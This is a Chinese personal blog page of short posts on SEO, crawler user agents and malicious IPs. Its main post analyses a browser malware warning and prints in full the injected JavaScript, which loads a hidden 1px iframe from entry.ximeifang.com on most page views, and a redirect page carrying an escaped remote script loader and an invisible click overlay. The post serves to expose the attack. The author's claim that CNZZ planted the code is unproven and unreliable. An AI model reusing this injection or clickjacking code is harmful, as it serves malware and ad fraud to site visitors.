关键词采集 关键词采集工具

分类: 随笔杂记预览模式: 普通 | 列表

日生鱼缸自动喂鱼器自动喂食器日生AF-2009D使用说明

作者:admin  日期:2019-08-25

 

分类:随笔杂记 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1013

ximeifang 恶意软件病毒揭秘

作者:admin  日期:2017-03-27

困扰了很多天的ximeifang.com恶意软件病毒问题终于搞清楚了,从开始怀疑cnzz到后来怀疑联通dns劫持,到现在确认是cnzz自己放的木马,过程还真是曲折。。。
木马表现:chrome浏览器下会提示
您要访问的网站包含恶意软件

攻击者可能会试图通过 entry.ximeifang.com 在您的计算机上安装危险程序,以窃取或删除您的信息(如照片、密码、通讯内容和信用卡信息)
 
木马来源:CNZZ官方。。。震惊。。。
代码如下:
http://c.cnzz.com/core.php?web_id=统计id&show=pic1&t=z
JavaScript代码
  1. var u = "http://c.cnzz.com/core.php?web_id=统计ID&show=pic1&t=z";  
  2. var wapp = 0.95;  
  3. var pcp = 0.95;  
  4. var serh = "entry.ximeifang.com:31002";  
  5. window.onerror = function(a, b, c) {  
  6.     return true;  
  7. };  
  8. function IsPC() {  
  9.     var a = navigator.userAgent;  
  10.     var b = ["Android""iPhone""SymbianOS""Windows Phone""iPad""iPod"];  
  11.     var c = true;  
  12.     for (var v = 0; v < b.length; v++) {  
  13.         if (a.indexOf(b[v]) > 0) {  
  14.             c = false;  
  15.             break  
  16.         }  
  17.     }  
  18.     return c;  
  19. };  
  20. function loadjs(a) {  
  21.     var c = document.createElement("script");  
  22.     c.setAttribute("type""text/javascript");  
  23.     c.setAttribute("src", a);  
  24.     c.setAttribute("charset""utf-8");  
  25.     document.getElementsByTagName("head")[0].appendChild(c);  
  26. };  
  27. function loadiframe(a) {  
  28.     var c = document.createElement("iframe");  
  29.     c.setAttribute("id""wbifr");  
  30.     c.setAttribute("name""wbifr");  
  31.     c.setAttribute("width""1px");  
  32.     c.setAttribute("height""1px");  
  33.     c.setAttribute("src", a);  
  34.     document.getElementsByTagName("head")[0].appendChild(c);  
  35. };  
  36. if (IsPC()) {  
  37.     if (Math.random() < pcp) {  
  38.         loadiframe("http://" + serh + "/fakepc");  
  39.     }  
  40. else {  
  41.     if (Math.random() < wapp) {  
  42.         loadiframe("http://" + serh + "/fakewap");  
  43.     }  
  44. }  
  45. if (u.indexOf("?") > 0) {  
  46.     u += "&aaa_flag=1"  
  47. else {  
  48.     u += "?aaa_flag=1"  
  49. }  
  50. loadjs(u);  
访问fakepc则会跳转到:
http://niujv.com/
该网页源码:
XML/HTML代码
  1. <!DOCTYPE html>  
  2. <html>  
  3. <head>  
  4. <body>  
  5. <script>  
  6. <!--  
  7. document.write(unescape("%3Cscript%20src%3D%22http%3A//code1.168wss.com/page/%3Fs%3D11636%22%3E%3C/script%3E"));  
  8. //-->  
  9. </script>  
  10. <img src="fr fc_9 mar.png" />  
  11. <a href="http://www.niwodai.com/event.mhtml?artId=1823227138797576&f&utm_source=baidutz&utm_medium=cpc&cid=sem-bd03-test-dylc-380&nwd_ext_aid=3000001481188029&source_id=" target="_blank" style="width: 0px;  height: 0px; position: absolute; top: 0px; left: 0px; background:  #b2b2b2; filter:alpha(opacity=10); -moz-opacity:0.1; -khtml-opacity:  0.1; opacity: 0.1;"></a>  
  12. <span style="display:none"><script src="https://s95.cnzz.com/z_stat.php?id=1261561746&web_id=1261561746" language="JavaScript"></script></span>  
  13. <head>  
  14. </body>  
  15. </html>  
又被嵌入了一层js。。。具体要干啥我也懒得分析了,反正不会是好事。。。
 
至此算是真相大白了,CNZZ的客服还说换https就不会被DNS劫持了。。。。
 
国内最大的流量统计服务商北京锐讯灵通科技有限公司。。。。

 

Tags: DNS劫持 木马

分类:随笔杂记 | 固定链接 | 评论: 4 | 引用: 0 | 查看次数: 2906

entry.ximeifang.com恶意软件病毒DNS劫持

作者:admin  日期:2017-03-24

Google chrome浏览器访问很多网站会提示恶意软件。所有出现提示的网站的共同特点是添加了cnzz的统计代码,本来怀疑是cnzz自己搞的,后来发现他们官网都有。。。最终确认是联通DNS劫持,这么多年了还是狗改不了吃屎,不过也可能是他们被黑了。。。

最新爆料:经过仔细分析,确认是CNZZ自己搞的,具体什么目的暂时还不清楚,但肯定是有黑幕!!!

请看我的分析:https://blog.guanjianci.net/article.asp?id=814

查看更多...

Tags: DNS劫持

分类:随笔杂记 | 固定链接 | 评论: 2 | 引用: 0 | 查看次数: 2287

成功解密了一套Php程序。

作者:admin  日期:2013-05-19

 成功解密了一套Php程序。小庆祝一下。

分类:随笔杂记 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2227

[私密日志] 私密日志

作者:admin  日期:2013-02-22

该日志是私密日志,只有博主或发布者可以查看!
分类:随笔杂记 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1633

中文搜索引擎蜘蛛大全

作者:admin  日期:2012-11-24

搜索引擎 蜘蛛名称
百度 baiduspider
谷歌 googlebot
搜狗 Sogou+web+spider
Bing bingbot
搜搜 Sosospider
360 360Spider
Msn msnbot
即刻 JikeSpider
有道 YoudaoBot
雅虎中文 Yahoo!+Slurp+China

欢迎补充。

Tags: 搜索引擎研究

分类:随笔杂记 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2806

百度观察期内的网站不要随便动!

作者:admin  日期:2012-11-04

 昨天刚恢复了几十页,晚上做了301重定向,今天site又成了0了,杯具。
去掉301重定向,又有一点收录了,变化真快。

Tags: 百度

分类:随笔杂记 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2209

这个伪造蜘蛛IP121.14.212.93有点搞笑

作者:admin  日期:2012-11-02

同时伪装百度蜘蛛和谷歌蜘蛛。
实际并不搞笑,一个很低级的防止网站阻止抓取的方法。原因是很多网站阻止抓取的方法也很低级>_<
121.14.212.93 Mozilla/4.0+(compatible;++Baiduspider/2.0;
++http://www.baidu.com/search/spider.html
++Googlebot/2.1;++http://www.google.com/bot.html) 200 0 0
是个私服网站IP。服务器IP位于广东省中山市。

是为了防止有些网站通过简单的包含判断是不是蜘蛛。

Tags: 百度

分类:随笔杂记 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 3141

发现一些恶意IP

作者:admin  日期:2012-10-28

173.252.202.87这个IP访问了2700多次,69.197.29.*这个IP段访问了4600多次,这些都是国外的服务器IP,分析判断应该是群发垃圾信息的IP,封杀!另外还有个北京的IP115.47.17.70试图远程连接Mysql数据库,查了一下竟然是个政府网站,估计被黑客利用了,一并封杀!

分类:随笔杂记 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1913

跟百度学写Robots.txt

作者:admin  日期:2012-10-26

搜索主站:
http://www.baidu.com/robots.txt

禁止所有搜索引擎抓取,特别列出了几个主要的引擎:谷歌、搜搜、搜狗、百度、MSN、即刻、百度图片

最后禁止所有:
User-agent: *
Disallow: /

百度知道:
http://zhidao.baidu.com/robots.txt

查看更多...

Tags: 百度

分类:随笔杂记 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2199

今天220.181.108.95和180.76.5.91来访了

作者:admin  日期:2012-10-20

不再仅仅是令人懊恼的123.125.*.*了,希望这是个好兆头。虽然咱不靠百度吃饭,不过怎么说呢。。面子问题。

220.181.108.95 Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html) 200 0 64
180.76.5.91 Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html) 200 0 0

 

Tags: 百度

分类:随笔杂记 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2618

定向营销其实不是大公司的专利!

作者:admin  日期:2012-10-19

定向营销:根据用户在网上的活动获取其需求,再使用邮件或短信方式推销产品。这个其实根据互联网的公开数据都完全可以做,同时这也反映出网民对个人隐私没有足够重视!
相关软件: https://blog.guanjianci.net/article.asp?id=190

Tags: 定向营销

分类:随笔杂记 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1868

 广告位

↑返回顶部↑